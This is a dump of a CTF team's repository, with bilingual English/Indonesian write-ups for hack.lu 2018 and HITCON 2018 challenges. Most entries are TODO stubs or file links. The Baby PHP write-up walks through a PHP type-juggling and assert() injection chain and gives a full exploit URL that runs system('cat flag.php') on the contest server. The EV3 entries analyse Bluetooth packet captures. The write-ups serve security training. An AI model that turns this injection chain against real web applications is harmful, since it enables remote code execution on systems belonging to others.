and exploit it now! The zip file will contain all information to this challenge. 6 | 7 | The password is the flag of babyreversing. 8 | 9 | `nc arcade.fluxfingers.net 1807` 10 | 11 | [Download](babyexploit_fbc7b89e5c7e3c72992a6a4d214c970b.zip) 12 | --- 13 | 14 | [Bahasa Indonesia](#bahasa-indonesia) 15 | 16 | ## English 17 | TODO 18 | 19 | 20 | ## Bahasa Indonesia 21 | TODO 22 | -------------------------------------------------------------------------------- /hacklu2018/baby-exploit/babyexploit_fbc7b89e5c7e3c72992a6a4d214c970b.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hacklu2018/baby-exploit/babyexploit_fbc7b89e5c7e3c72992a6a4d214c970b.zip -------------------------------------------------------------------------------- /hacklu2018/baby-kernel/README.md: -------------------------------------------------------------------------------- 1 | # Baby Kernel 2 | --- 3 | **Points:** 189 | **Solves:** 93/1035 | **Category:** Pwn 4 | 5 | If you are like most of us and kernel addresses scare you in a way this may be the time to get in contact for the first time. 6 | 7 | They are not as scary after all. Enjoy! 8 | 9 | `nc arcade.fluxfingers.net 1817` 10 | 11 | [Download](baby_kernel_3460960b6fc99f8a90fba7397b5e4c46.zip) 12 | --- 13 | 14 | [Bahasa Indonesia](#bahasa-indonesia) 15 | 16 | ## English 17 | TODO 18 | 19 | 20 | ## Bahasa Indonesia 21 | TODO 22 | -------------------------------------------------------------------------------- /hacklu2018/baby-kernel/baby_kernel_3460960b6fc99f8a90fba7397b5e4c46.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hacklu2018/baby-kernel/baby_kernel_3460960b6fc99f8a90fba7397b5e4c46.zip -------------------------------------------------------------------------------- /hacklu2018/baby-php/README.md: -------------------------------------------------------------------------------- 1 | # Baby PHP 2 | --- 3 | **Points:** 153 | **Solves:** 147/1035 | **Category:** Web 4 | 5 | PHP is a popular general-purpose scripting language that is especially suited to web development. 6 | 7 | Fast, flexible and pragmatic, PHP powers everything from your blog to the most popular websites in the world. 8 | 9 | [Can you untangle this mess?!](https://arcade.fluxfingers.net:1819/) 10 | --- 11 | 12 | [Bahasa Indonesia](#bahasa-indonesia) 13 | 14 | ## English 15 | Given a PHP code as follows: 16 | 17 | ```php 18 | $hack){ 57 | $$lel = $hack; 58 | } 59 | } 60 | 61 | $ b = "2";$a=" b";//;1=b 62 | 63 | if($$a !== $k1){ 64 | die("lel no\n"); 65 | } 66 | 67 | // plz die now 68 | assert_options(ASSERT_BAIL, 1); 69 | assert("$bb == $cc"); 70 | 71 | echo "Good Job ;)"; 72 | // TODO 73 | // echo $flag; 74 | ``` 75 | 76 | There are several traps in this problem. First, note that `preg_match('/^\d+$/', $k2)` doesn't use `$` dollar sign but `$` or unicode character for [full width dollar sign](http://graphemica.com/%EF%BC%84). Second, if the source code is written using `highlight_file(__FILE__);` (just like in the problem), there is a line like this: 77 | 78 | ![](trap.png) 79 | 80 | The real code is `$ b = "2";$a=" b";//;1=b` because it uses the unicode U+202E or [right-to-left override](https://www.charbase.com/202e-unicode-right-to-left-override) in the variable name (`$ b`) and assignment (`$a=" b"`) so the string is reversed when displayed. 81 | 82 | Our goal is to reach `echo "Good Job ;)";`. There is `// echo $flag;` which indicates that there is a variable named `$flag` but it's not written to the output because it's a comment. We can use `assert("$bb == $cc");` to get arbitrary code execution if we can control `$bb` or `$cc` because `assert` [evaluating string like `eval`](http://php.net/manual/en/function.assert.php). 83 | 84 | The `$msg`, `$k1`, dan `$k2` variables can be controlled with GET requests. If the requirement satisfied, we can also replace `$cc` in the middle through `@$cc = $_GET['cc'];` and also create variables with the names and values of our own via `$$lel = $hack;` because the value of `$lel` and `$hack` is taken from `foreach ($_GET as $lel => $hack)`. 85 | 86 | To achieve remote code execution, here are some things that must be utilized and done until it reaches the `assert` with the variables we control. 87 | 88 | ### PHP Wrapper 89 | 90 | ```php 91 | @$msg = $_GET['msg']; 92 | if(@file_get_contents($msg)!=="Hello Challenge!"){ 93 | die('Wow so rude!!!!1'); 94 | } 95 | ``` 96 | 97 | Besides the path to a file, the `file_get_contents` function can also receive [protocol and *wrapper*](http://php.net/manual/en/wrappers.php). Unfortunately, it looks like the internet is turned off so `http: //` to the web that we control that contains `Hello Challenge!` cannot work. Alternatively, we can use [`data: //`](http://php.net/manual/en/wrappers.data.php). We can use `data://text/plain,Hello%20Challenge!` as the value of `$msg`. 98 | 99 | ### Strict Comparison 100 | 101 | ```php 102 | if(intval($k1) !== $cc || $k1 === $cc){ 103 | die("lol no\n"); 104 | } 105 | ``` 106 | 107 | Note that `$k1` is taken from `$_GET['key1'] `so that the variable data type is a string. Comparison with the `$cc` variable uses strict comparison (the value and data type must be the same). The `$cc` variable contains 1337 (number) so we can just set `$k1` to 1337. The comparison result of `$k1 === $cc` will be `false`. 108 | 109 | ### Loose Comparison 110 | 111 | ```php 112 | if(strlen($k2) == $bb){ 113 | if(preg_match('/^\d+$/', $k2) && !is_numeric($k2)){ 114 | if($k2 == $cc){ 115 | @$cc = $_GET['cc']; 116 | } 117 | } 118 | } 119 | 120 | ``` 121 | 122 | The value of `$k2` can't be numeric but must be the same as `$cc` which contains 1337. The comparison uses loose comparison so that we can set `$k2` with a string beginning with 1337. The string length must match the value `$bb`, which is 42. The regex match used must also be met (remember that the dollar sign is a trap, after 1337 we must enter the unicode character `$`). We can use `1337%EF%BC%8400000000000000000000000000000000000` as the value of `$k2` so that the value of `$cc` can be controlled. 123 | 124 | ### NULL Comparison 125 | 126 | ```php 127 | if(substr($cc, $bb) === sha1($cc)){ 128 | foreach ($_GET as $lel => $hack){ 129 | $$lel = $hack; 130 | } 131 | } 132 | ``` 133 | 134 | The value of `$bb` is 42 and we can control the `$cc` variable. It seems difficult to fulfill `substr ($cc, $bb) === sha1($cc)`. The trick is to use array. The value of `substr ([], 42)` and `sha1 ([])` is NULL so that the comparison is fulfilled. We can set the `$cc` value to an array on GET request so that we can create variables with our own names and values. 135 | 136 | ### Variable Variable 137 | 138 | ```php 139 | $ b = "2";$a=" b";//;1=b 140 | 141 | if($$a !== $k1){ 142 | die("lel no\n"); 143 | } 144 | ``` 145 | 146 | In PHP, [*variable variable*](http://php.net/manual/en/language.variables.variable.php) can be used to retrieve values ​​with dynamic names. For example, in the example above, the value of `$$a` is `2`. Remember that `$ b` is not using a space but a U+202E unicode character. The value of `$k1` can be controlled so we only needs to set `$k1` with `2`. 147 | 148 | ### Remote Code Execution 149 | 150 | ```php 151 | assert("$bb == $cc"); 152 | ``` 153 | 154 | The value of `$bb` and `$cc` can be controlled but `$cc` must be an array so that when converted to a string it will become `Array`. The syntax used must be correct while `== Array` will generate syntax error when the string is evaluated by the `assert`. The trick is to use `;` and comment `//` in `$bb`. We can run any PHP code. To do remote code execution, we can use functions such as `system`. For example, to read the `flag.php` file, we can set `$bb` with `system('cat flag.php'); // `. 155 | 156 | ### Final Exploit 157 | 158 | Here is an example of exploit request to get the flag. 159 | 160 | ``` 161 | view-source:https://arcade.fluxfingers.net:1819/?msg=data://text/plain,Hello%20Challenge!&key1=1337&key2=1337%EF%BC%8400000000000000000000000000000000000&cc[]=a&k1=2&bb=system(%27cat%20flag.php%27);%20//%20%22 162 | ``` 163 | 164 | 165 | ## Bahasa Indonesia 166 | Diberikan sebuah kode PHP seperti berikut: 167 | 168 | ```php 169 | $hack){ 208 | $$lel = $hack; 209 | } 210 | } 211 | 212 | $ b = "2";$a=" b";//;1=b 213 | 214 | if($$a !== $k1){ 215 | die("lel no\n"); 216 | } 217 | 218 | // plz die now 219 | assert_options(ASSERT_BAIL, 1); 220 | assert("$bb == $cc"); 221 | 222 | echo "Good Job ;)"; 223 | // TODO 224 | // echo $flag; 225 | ``` 226 | 227 | Ada beberapa jebakan dalam soal ini. Pertama, perhatikan bahwa `preg_match('/^\d+$/', $k2)` bukan menggunakan tanda dolar `$` melainkan `$` atau karakter unicode untuk [full width dollar sign](http://graphemica.com/%EF%BC%84). Kedua, apabila kode sumber dituliskan menggunakan `highlight_file(__FILE__);` terlihat baris seperti ini: 228 | 229 | ![](trap.png) 230 | 231 | Kode yang asli adalah `$ b = "2";$a=" b";//;1=b` menggunakan karakter unicode U+202E atau [right-to-left override](https://www.charbase.com/202e-unicode-right-to-left-override) pada nama variabel `$ b` dan juga pengisian `$a=" b"` sehingga ketika ditampilkan stringnya terbalik. 232 | 233 | Tujuan kita adalah mencapai `echo "Good Job ;)";`. Terlihat bahwa terdapat `// echo $flag;` yang menandakan bahwa ada variabel bernama `$flag` tetapi tidak dituliskan ke output karena kode tersebut adalah komentar. Kita dapat memanfaatkan `assert("$bb == $cc");` untuk melakukan kontrol eksekusi kode apabila variabel `$bb` atau `$cc` dapat kita kontrol karena `assert` [melakukan evaluasi string seperti `eval`](http://php.net/manual/en/function.assert.php). 234 | 235 | Variabel `$msg`, `$k1`, dan `$k2` dapat kita kontrol melalui GET *requests*. Apabila persyaratan memenuhi, kita juga dapat mengganti variabel `$cc` di tengah-tengah melalui `@$cc = $_GET['cc'];` dan juga membuat variabel dengan nama serta isi dari kita sendiri melalui `$$lel = $hack;` karena nilai dari `$lel` dan `$hack` diambil dari `foreach ($_GET as $lel => $hack)`. 236 | 237 | Untuk mencapai *remote code execution*, berikut adalah beberapa hal yang harus dimanfaatkan dan dilakukan hingga mencapai `assert` dengan variabel yang kita kontrol. 238 | 239 | ### PHP Wrapper 240 | 241 | ```php 242 | @$msg = $_GET['msg']; 243 | if(@file_get_contents($msg)!=="Hello Challenge!"){ 244 | die('Wow so rude!!!!1'); 245 | } 246 | ``` 247 | 248 | Selain *path* menuju berkas, fungsi `file_get_contents` juga dapat menerima [protokol dan *wrapper*](http://php.net/manual/en/wrappers.php). Sayangnya, sepertinya internet dimatikan sehingga `http://` menuju web yang kita kontrol yang berisi `Hello Challenge!` tidak dapat bekerja. Alternatifnya, kita dapat menggunakan [`data://`](http://php.net/manual/en/wrappers.data.php). Kita dapat menggunakan `data://text/plain,Hello%20Challenge!` sebagai nilai dari `$msg`. 249 | 250 | ### Strict Comparison 251 | 252 | ```php 253 | if(intval($k1) !== $cc || $k1 === $cc){ 254 | die("lol no\n"); 255 | } 256 | ``` 257 | 258 | Perhatikan bahwa `$k1` diambil dari `$_GET['key1']` sehingga tipe data variabelnya adalah string. Perbandingan dengan variabel `$cc` menggunakan `strict comparison` (harus sama nilai dan tipe datanya). Variabel `$cc` berisi bilangan 1337 sehingga nilai dari $k1 bisa kita isi 1337. Perbandingan `$k1 === $cc` akan bernilai `false`. 259 | 260 | ### Loose Comparison 261 | 262 | ```php 263 | if(strlen($k2) == $bb){ 264 | if(preg_match('/^\d+$/', $k2) && !is_numeric($k2)){ 265 | if($k2 == $cc){ 266 | @$cc = $_GET['cc']; 267 | } 268 | } 269 | } 270 | 271 | ``` 272 | 273 | Variabel `$k2` tidak boleh berupa numerik tetapi harus sama dengan `$cc` yang berisi 1337. Perbandingan menggunakan `loose comparison` sehingga kita dapat mengisi `$k2` dengan string yang diawali 1337. Panjang string harus sesuai dengan nilai `$bb`, yaitu 42. Regex yang digunakan juga harus dipenuhi (ingat bahwa tanda dolar tersebut adalah jebakan, setelah 1337 kita harus memasukkan karakter unicode `$`). Kita dapat menggunakan `1337%EF%BC%8400000000000000000000000000000000000` sebagai nilai `$k2` agar nilai `$cc` dapat kita kontrol. 274 | 275 | ### NULL Comparison 276 | 277 | ```php 278 | if(substr($cc, $bb) === sha1($cc)){ 279 | foreach ($_GET as $lel => $hack){ 280 | $$lel = $hack; 281 | } 282 | } 283 | ``` 284 | 285 | Nilai dari `$bb` adalah 42 dan variabel `$cc` dapat kita kontrol. Sepertinya sulit untuk memenuhi `substr($cc, $bb) === sha1($cc)` dengan cara biasa. Triknya adalah menggunakan array. Nilai dari `substr([], 42)` dan `sha1([])` adalah NULL sehingga perbandingan terpenuhi. Kita dapat mengatur nilai `$cc` menjadi array pada GET *request* sehingga kita dapat membuat variabel yang nama dan isinya dapat kita atur. 286 | 287 | ### Variable Variable 288 | 289 | ```php 290 | $ b = "2";$a=" b";//;1=b 291 | 292 | if($$a !== $k1){ 293 | die("lel no\n"); 294 | } 295 | ``` 296 | 297 | Pada PHP, [*variable variable*](http://php.net/manual/en/language.variables.variable.php) dapat digunakan untuk pengambilan nilai dengan nama dinamis. Misal, pada contoh di atas, nilai dari `$$a` adalah `2`. Ingat bahwa sebelum `b` bukanlah spasi melainkan karakter unicode U+202E. Nilai dari `$k1` dapat kita kontrol melalui langkah sebelumnya sehingga cukup isi `$k1` dengan `2`. 298 | 299 | ### Remote Code Execution 300 | 301 | ```php 302 | assert("$bb == $cc"); 303 | ``` 304 | 305 | Variabel `$bb` dan `$cc` dapat kita kontrol tetapi `$cc` harus berupa array sehingga ketika dikonversi menjadi string akan bernilai `Array`. Sintaks yang digunakan harus benar sementara `== Array` akan menghasilkan `syntax error` ketika evaluasi. Triknya adalah menggunakan `;` dan komentar `//` pada `$bb`. Kita dapat menjalankan kode PHP apa saja. Untuk melakukan `remote code execution`, kita dapat menggunakan fungsi seperti `system`. Contoh, untuk membaca berkas `flag.php`, nilai `$bb` dapat kita isi dengan `system('cat flag.php'); // `. 306 | 307 | ### Final Exploit 308 | 309 | Berikut adalah salah satu *request* yang dapat dilakukan untuk mendapatkan flag. 310 | 311 | ``` 312 | view-source:https://arcade.fluxfingers.net:1819/?msg=data://text/plain,Hello%20Challenge!&key1=1337&key2=1337%EF%BC%8400000000000000000000000000000000000&cc[]=a&k1=2&bb=system(%27cat%20flag.php%27);%20//%20%22 313 | ``` 314 | -------------------------------------------------------------------------------- /hacklu2018/baby-php/trap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hacklu2018/baby-php/trap.png -------------------------------------------------------------------------------- /hacklu2018/baby-reverse/README.md: -------------------------------------------------------------------------------- 1 | # Baby Reverse 2 | --- 3 | **Points:** 108 | **Solves:** 254/1035 | **Category:** Reverse 4 | 5 | Hey there! 6 | 7 | Disclaimer: This chall is intended for new gamers only ;-)! You veterans got plenty of other Challenges which will keep you busy, so please pass this Challenge to someone, who never or rarely reversed before! We encourage everyone who never reversed anything to try this challenge. We believe in you and your future reversing skills =). You CAN do it! 8 | 9 | The task is to find the correct input which will be the flag. See the challenge files for more instructions. 10 | 11 | [Download](babyreverse_7f08571960ce032bf2a9a0ffb7a1c427.zip) 12 | --- 13 | 14 | [Bahasa Indonesia](#bahasa-indonesia) 15 | 16 | ## English 17 | TODO 18 | 19 | 20 | ## Bahasa Indonesia 21 | TODO 22 | -------------------------------------------------------------------------------- /hacklu2018/baby-reverse/babyreverse_7f08571960ce032bf2a9a0ffb7a1c427.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hacklu2018/baby-reverse/babyreverse_7f08571960ce032bf2a9a0ffb7a1c427.zip -------------------------------------------------------------------------------- /hacklu2018/cheat-console/CheatConsole_4648d68145298cca67d3a6b97d6dbe50.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hacklu2018/cheat-console/CheatConsole_4648d68145298cca67d3a6b97d6dbe50.zip -------------------------------------------------------------------------------- /hacklu2018/forgetful-commander/ForgetfulCommander_85dcf6730d6936301904fc2218c77d6c.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hacklu2018/forgetful-commander/ForgetfulCommander_85dcf6730d6936301904fc2218c77d6c.zip -------------------------------------------------------------------------------- /hacklu2018/heap-heaven-2/README.md: -------------------------------------------------------------------------------- 1 | # Relations 2 | --- 3 | **Points:** 205 | **Solves:** 73/1035 | **Category:** Crypto 4 | 5 | Two completely unrelated operations on completely unrelated values, right? 6 | 7 | `nc arcade.fluxfingers.net 1821` 8 | --- 9 | 10 | [Bahasa Indonesia](#bahasa-indonesia) 11 | 12 | ## English 13 | TODO 14 | 15 | 16 | ## Bahasa Indonesia 17 | TODO 18 | -------------------------------------------------------------------------------- /hacklu2018/relations/README.md: -------------------------------------------------------------------------------- 1 | # Relations 2 | --- 3 | **Points:** 205 | **Solves:** 73/1035 | **Category:** Crypto 4 | 5 | Two completely unrelated operations on completely unrelated values, right? 6 | 7 | `nc arcade.fluxfingers.net 1821` 8 | --- 9 | 10 | [Bahasa Indonesia](#bahasa-indonesia) 11 | 12 | ## English 13 | TODO 14 | 15 | 16 | ## Bahasa Indonesia 17 | TODO 18 | -------------------------------------------------------------------------------- /hitcon2018/README.md: -------------------------------------------------------------------------------- 1 | # HITCON CTF 2018 Online Quals 2 | 3 | https://ctftime.org/event/669 4 | 5 | ## Misc 6 | - [ev3-basic (100)](ev3-basic) 7 | - [ev3-scanner (180)](ev3-scanner) 8 | 9 | ## Web 10 | - [Baby Cake (400)](baby-cake) 11 | -------------------------------------------------------------------------------- /hitcon2018/baby-cake/baby_cake.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hitcon2018/baby-cake/baby_cake.tgz -------------------------------------------------------------------------------- /hitcon2018/baby-cake/screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hitcon2018/baby-cake/screenshot.png -------------------------------------------------------------------------------- /hitcon2018/ev3-basic/README.md: -------------------------------------------------------------------------------- 1 | # ev3-basic 2 | --- 3 | **Points:** 100 | **Solves:** 255/1789 | **Category:** Misc 4 | 5 | Find the flag. 6 | 7 | [Download](ev3basic-1e0165aa826649b7e3c5869a62faf8ba.tar.gz) 8 | 9 | Author: Jeffxx 10 | 11 | --- 12 | 13 | [Bahasa Indonesia](#bahasa-indonesia) 14 | 15 | ## English 16 | In this challenge, given tar files contains image LEGO EV3 printing partial flag on screen and pklg files which contains data transmission on RFCOMM protocol. Use filter on wireshark to see what data send to LEGO EV3 device. 17 | 18 | ``` 19 | bluetooth.dst == 00:16:53:61:30:c1 && btrfcomm 20 | ``` 21 | 22 | After we apply filter, we can see much packet have packet length between 32 and 34. From this we analyze 2 packet data which have length between that. 23 | 24 | ``` 25 | 0000 02 0c 20 1b 00 17 00 40 00 0b ef 27 11 00 2a 00 .. ....@...'..*. 26 | 0010 00 00 00 84 05 01 0a 81 28 84 68 00 84 00 80 9a ........(.h..... 27 | 28 | 0000 02 0c 20 1b 00 17 00 40 00 0b ef 27 11 00 2a 00 .. ....@...'..*. 29 | 0010 00 00 00 84 05 01 14 81 28 84 69 00 84 00 80 9a ........(.i..... 30 | ``` 31 | 32 | Between this 2 packet there is 2 byte different, on offset `0x16` and `0x1a`. On offset `0x1a` has value `h` and `i`, we suspect that is flag pieces. After we compare with given image, character `h` and `i` side by side. So, we concludes that offset `0x16` is `x coordinate` of screen LEGO EV3. 33 | 34 | After we know that, we can extract x coordinate, y coordinate, and char printed from packet with length between 32 and 34. After that we just need to sort data. 35 | 36 | The following is the script used. 37 | 38 | ```python 39 | 40 | flagp = ["0a:28:68", "14:28:69", "1e:28:74", "1e:44:5f", "14:52:6f", "0a:36:5f", 41 | "1e:52:70", "14:36:63", "0a:44:6e", "14:44:64", "1e:36:6f", "0a:52:6c", 42 | "64:52:7d", "46:28:7b", "5a:28:31", "3c:28:6e", "28:28:63", "6e:28:64", 43 | "32:28:6f", "50:28:6d", "78:36:69", "28:52:65", "46:52:6b", "3c:44:72", 44 | "28:44:66", "5a:44:61", "3c:36:75", "64:36:61", "32:44:69", "78:28:35", 45 | "64:28:6e", "5a:52:74", "78:44:5f", "64:44:72", "46:36:6e", "50:52:69", 46 | "32:36:6d", "28:36:6d", "5a:36:63", "46:44:6d", "6e:36:74", "50:36:69", 47 | "3c:52:5f", "50:44:77", "32:52:72", "6e:44:65", "8c:44:65", "a0:36:61", 48 | "96:44:76", "82:44:64", "a0:44:65", "96:28:72", "82:36:6f", "a0:28:6d", 49 | "8c:28:30", "96:36:5f", "82:28:74", "8c:36:6e"] 50 | 51 | flag = {} 52 | 53 | def parse(sc): 54 | temp = sc.split(":") 55 | x = int(temp[0], 16) 56 | y = int(temp[1], 16) 57 | c = int(temp[2], 16) 58 | flag[y*16 + x] = chr(c) 59 | 60 | for f in flagp: 61 | parse(f) 62 | 63 | sflag = "" 64 | 65 | for i in sorted(flag): 66 | sflag += flag[i] 67 | 68 | print sflag 69 | ``` 70 | 71 | Flag: **hitcon{m1nd5t0rm_communication_and_firmware_developer_kit}** 72 | 73 | 74 | ## Bahasa Indonesia 75 | Pada challenge ini diberikan sebuah file tar yang berisi sebuah gambar serta file pklg yang dapat dibuka dengan wireshark. File gambar berisi LEGO EV3 yang menampilkan potongan flag. Sedangkan file pklg ini berisi transmisi data pada protokol RFCOMM. Langsung lakukan filter pada wireshark untuk melihat apa yang dikirim ke device LEGO EV3. 76 | 77 | ``` 78 | bluetooth.dst == 00:16:53:61:30:c1 && btrfcomm 79 | ``` 80 | 81 | Setelah dilakukan filter dapat dilihat ada banyak packet yang memiliki panjang sekitar 32-34. Dari situ kita lakukan analisis pada 2 paket pertama yang memiliki panjang tersebut. 82 | 83 | ``` 84 | 0000 02 0c 20 1b 00 17 00 40 00 0b ef 27 11 00 2a 00 .. ....@...'..*. 85 | 0010 00 00 00 84 05 01 0a 81 28 84 68 00 84 00 80 9a ........(.h..... 86 | 87 | 0000 02 0c 20 1b 00 17 00 40 00 0b ef 27 11 00 2a 00 .. ....@...'..*. 88 | 0010 00 00 00 84 05 01 14 81 28 84 69 00 84 00 80 9a ........(.i..... 89 | ``` 90 | 91 | Di antara kedua packet tersebut hanya terdapat 2 byte yang berbeda, yaitu pada offset `0x16` dan `0x1a`. Pada offset `0x1a` berisi huruf `h` dan `i`, kita mencurigai bahwa ini potongan flag. Setelah dihubungkan dengan gambar yang diberikan, letak huruf `h` dan `i` bersebelahan. Sehingga kita mengambil kesimpulan offset `0x16` adalah `koordinat x` dari layar LEGO EV3. 92 | 93 | Setelah mengetahui hal tersebut, kita lakukan ekstraksi data yang memiliki panjang 32-34. Data yang kita ambil berupa koordinat x, koordinat y, serta huruf yang diprint. Kemudian sort data yang kita dapatkan. 94 | 95 | Berikut adalah script yang digunakan. 96 | 97 | ```python 98 | 99 | flagp = ["0a:28:68", "14:28:69", "1e:28:74", "1e:44:5f", "14:52:6f", "0a:36:5f", 100 | "1e:52:70", "14:36:63", "0a:44:6e", "14:44:64", "1e:36:6f", "0a:52:6c", 101 | "64:52:7d", "46:28:7b", "5a:28:31", "3c:28:6e", "28:28:63", "6e:28:64", 102 | "32:28:6f", "50:28:6d", "78:36:69", "28:52:65", "46:52:6b", "3c:44:72", 103 | "28:44:66", "5a:44:61", "3c:36:75", "64:36:61", "32:44:69", "78:28:35", 104 | "64:28:6e", "5a:52:74", "78:44:5f", "64:44:72", "46:36:6e", "50:52:69", 105 | "32:36:6d", "28:36:6d", "5a:36:63", "46:44:6d", "6e:36:74", "50:36:69", 106 | "3c:52:5f", "50:44:77", "32:52:72", "6e:44:65", "8c:44:65", "a0:36:61", 107 | "96:44:76", "82:44:64", "a0:44:65", "96:28:72", "82:36:6f", "a0:28:6d", 108 | "8c:28:30", "96:36:5f", "82:28:74", "8c:36:6e"] 109 | 110 | flag = {} 111 | 112 | def parse(sc): 113 | temp = sc.split(":") 114 | x = int(temp[0], 16) 115 | y = int(temp[1], 16) 116 | c = int(temp[2], 16) 117 | flag[y*16 + x] = chr(c) 118 | 119 | for f in flagp: 120 | parse(f) 121 | 122 | sflag = "" 123 | 124 | for i in sorted(flag): 125 | sflag += flag[i] 126 | 127 | print sflag 128 | ``` 129 | 130 | Flag: **hitcon{m1nd5t0rm_communication_and_firmware_developer_kit}** 131 | -------------------------------------------------------------------------------- /hitcon2018/ev3-basic/ev3basic-1e0165aa826649b7e3c5869a62faf8ba.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hitcon2018/ev3-basic/ev3basic-1e0165aa826649b7e3c5869a62faf8ba.tar.gz -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/README.md: -------------------------------------------------------------------------------- 1 | # ev3-scanner 2 | --- 3 | **Points:** 180 | **Solves:** 84/1789 | **Category:** Misc 4 | 5 | Find the flag. 6 | 7 | [Download](ev3scanner-6b325d724565e51b3e2f8e59ff5ee6c9.tar.gz) 8 | 9 | Author: Jeffxx 10 | 11 | --- 12 | 13 | [Bahasa Indonesia](#bahasa-indonesia) 14 | 15 | ## English 16 | In this challenge, given tar files contains an image and a pklg file that can be opened with Wireshark. Image files containing LEGO EV3 using a color sensor are seen to scan the paper containing the flag. While pklg file contains data transmission on RFCOMM protocol. Use filter on wireshark to see the color data sent by LEGO EV3. 17 | 18 | ``` 19 | bluetooth.src == 00:16:53:61:30:c1 && btrfcomm 20 | ``` 21 | 22 | After we apply filter, we can see much packet have data length 9 bytes. So we add filter again for data length = 9. 23 | 24 | ``` 25 | btrfcomm.len == 9 26 | ``` 27 | 28 | After we analyze some packet, we can see different 2-3 last byte. Besides that, there is much value `c0 40` and `80 3f` appear sequentially. We suspect the value is a representation of black and white. In addition to the 2 values above, we consider it as the color obtained when LEGO EV3 comes out of the paper and change direction. So we can extract color data scanned by each row. 29 | 30 | using [this script](flag/solve.py) we iterated extracted data, we got output similar with flag. With a little adjustment we got the flag. 31 | 32 | ![](flag.png) 33 | 34 | Flag: **hitcon{EV3GYROSUCKS}** 35 | 36 | 37 | ## Bahasa Indonesia 38 | Pada challenge ini diberikan sebuah file tar yang berisi sebuah gambar serta file pklg yang dapat dibuka dengan wireshark. File gambar berisi LEGO EV3 dengan menggunakan sensor warna terlihat akan melakukan scan pada kertas yang berisi flag. Sedangkan file pklg ini berisi transmisi data pada protokol RFCOMM. Langsung lakukan filter pada wireshark untuk melihat data warna yang dikirim oleh LEGO EV3. 39 | 40 | ``` 41 | bluetooth.src == 00:16:53:61:30:c1 && btrfcomm 42 | ``` 43 | 44 | Setelah dilakukan filter dapat dilihat ada banyak packet yang memiliki panjang data 9 byte. Tambahkan lagi filter untuk data dengan panjang 9. 45 | 46 | ``` 47 | btrfcomm.len == 9 48 | ``` 49 | 50 | Setelah kami menganalisa kumpulan packet tersebut, terdapat perbedaan byte pada 2-3 byte terakhir. Selain itu, terdapat value `c0 40` dan `80 3f` yang banyak muncul secara berurutan pada packet tersebut. Kami mencurigai value tersebut representasi dari warna hitam dan putih. Selain 2 value diatas, kami menganggapnya sebagai warna yang didapat ketika LEGO EV3 keluar dari kertas dan berbalik arah. Sehingga kita dapat melakukan extraksi data warna yang di scan tiap baris. 51 | 52 | Dengan menggunakan [script](flag/solve.py) untuk iterasi data yang telah kami extract, didapatkan sebuah gambar yang mirip flag. dengan sedikit penyesuaian didapatkanlah flag. 53 | 54 | ![](flag.png) 55 | 56 | Flag: **hitcon{EV3GYROSUCKS}** 57 | -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/ev3scanner-6b325d724565e51b3e2f8e59ff5ee6c9.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hitcon2018/ev3-scanner/ev3scanner-6b325d724565e51b3e2f8e59ff5ee6c9.tar.gz -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hitcon2018/ev3-scanner/flag.png -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line1.txt: -------------------------------------------------------------------------------- 1 | 07002a000200008040 2 | 07002a00020000c040 3 | 07002a00020000c040 4 | 07002a00020000803f 5 | 07002a000200000040 6 | 07002a00020000c040 7 | 07002a00020000c040 8 | 07002a00020000c040 9 | 07002a00020000c040 10 | 07002a00020000c040 11 | 07002a00020000c040 12 | 07002a00020000c040 13 | 07002a00020000c040 14 | 07002a00020000c040 15 | 07002a00020000c040 16 | 07002a00020000c040 17 | 07002a00020000c040 18 | 07002a00020000c040 19 | 07002a00020000c040 20 | 07002a00020000c040 21 | 07002a00020000c040 22 | 07002a00020000c040 23 | 07002a00020000c040 24 | 07002a00020000c040 25 | 07002a00020000c040 26 | 07002a00020000c040 27 | 07002a00020000c040 28 | 07002a00020000c040 29 | 07002a00020000c040 30 | 07002a00020000c040 31 | 07002a00020000c040 32 | 07002a00020000c040 33 | 07002a00020000c040 34 | 07002a00020000c040 35 | 07002a00020000c040 36 | 07002a00020000c040 37 | 07002a00020000c040 38 | 07002a00020000c040 39 | 07002a00020000c040 40 | 07002a00020000c040 41 | 07002a00020000c040 42 | 07002a00020000c040 43 | 07002a00020000c040 44 | 07002a00020000c040 45 | 07002a00020000c040 46 | 07002a00020000c040 47 | 07002a00020000c040 48 | 07002a00020000c040 49 | 07002a00020000c040 50 | 07002a00020000c040 51 | 07002a00020000c040 52 | 07002a00020000803f 53 | 07002a00020000803f 54 | 07002a00020000803f 55 | 07002a00020000c040 56 | 07002a00020000c040 57 | 07002a00020000c040 58 | 07002a000200008040 59 | 07002a00020000803f 60 | 07002a00020000803f 61 | 07002a00020000803f 62 | 07002a00020000803f 63 | 07002a00020000803f 64 | 07002a00020000803f 65 | 07002a00020000c040 66 | 07002a00020000c040 67 | 07002a00020000c040 68 | 07002a00020000803f 69 | 07002a00020000c040 70 | 